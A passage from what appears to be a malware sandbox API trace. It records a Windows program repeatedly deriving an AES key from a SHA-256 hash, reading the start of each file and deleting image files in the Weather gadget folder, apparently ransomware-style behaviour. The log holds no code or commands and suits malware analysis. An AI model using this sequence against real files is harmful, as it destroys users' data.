returned 1 [0194.542] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\29.png")) returned 0 [0194.542] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.543] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.543] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.543] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.543] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1456 [0194.543] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.562] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.562] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.562] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.563] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\3.png")) returned 0 [0194.564] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.564] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.565] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.565] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.565] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1010 [0194.565] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.568] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.568] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.568] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.570] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\30.png")) returned 0 [0194.592] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.592] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.592] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.592] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.592] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16df [0194.593] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.602] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.602] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.602] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.604] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\31.png")) returned 0 [0194.604] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.605] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.605] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.605] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.605] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16df [0194.606] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.608] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.608] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.608] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.610] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\32.png")) returned 0 [0194.715] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.715] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.715] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.715] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.715] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1010 [0194.715] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.718] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.718] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.718] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.720] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\33.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\33.png")) returned 0 [0194.720] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.721] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.721] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.721] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.721] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1010 [0194.721] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.723] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.724] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.724] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.725] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\34.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\34.png")) returned 0 [0194.727] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.728] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.728] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.728] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.728] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1551 [0194.728] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.731] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.731] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.731] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.732] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\35.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\35.png")) returned 0 [0194.733] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.733] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.733] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.733] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.733] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16df [0194.733] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.736] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.736] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.736] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.738] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\36.png")) returned 0 [0194.739] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.740] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.740] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.740] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.740] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1456 [0194.740] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.743] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.743] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.743] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.744] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\37.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\37.png")) returned 0 [0194.745] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.747] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.747] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.747] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.747] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1456 [0194.747] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.759] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.759] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.759] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.760] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\38.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\38.png")) returned 0 [0194.762] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.762] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.762] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.762] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.762] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1551 [0194.763] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.794] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.794] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.794] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.796] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\39.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\39.png")) returned 0 [0194.796] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.797] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.797] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.797] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.797] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1456 [0194.797] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.805] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.805] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.805] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.807] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\4.png")) returned 0 [0194.814] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.814] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.814] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.814] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.815] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1874 [0194.815] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.819] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.819] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.819] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.821] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\40.png")) returned 0 [0194.821] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.822] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.822] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.822] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.822] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfe2 [0194.822] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.826] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.826] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.826] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.827] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\41.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\41.png")) returned 0 [0194.829] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.830] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.830] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.830] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.830] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1135 [0194.830] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.833] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.833] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.833] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.834] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\42.png")) returned 0 [0194.835] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.835] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.835] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.835] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.835] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1135 [0194.835] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.840] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.840] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.840] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.841] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\43.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\43.png")) returned 0 [0194.842] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.842] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.842] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.842] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.843] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb1e [0194.843] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.846] CryptDestroyHash (hHash=0x284d528) returned 1 [0194.846] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.846] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.847] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\44.png")) returned 0 [0194.848] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.848] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.848] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.848] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.848] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1551 [0194.848] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0194.852] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0194.852] CryptDestroyKey (hKey=0x284d568) returned 1 [0194.852] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0194.853] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\45.png")) returned 0 [0194.854] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0194.854] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0194.854] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0194.855] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0194.855] GetFileSize (in: hFile=0x5ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfe2 [0194.855] ReadFile (in: hFile=0x5ac, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, 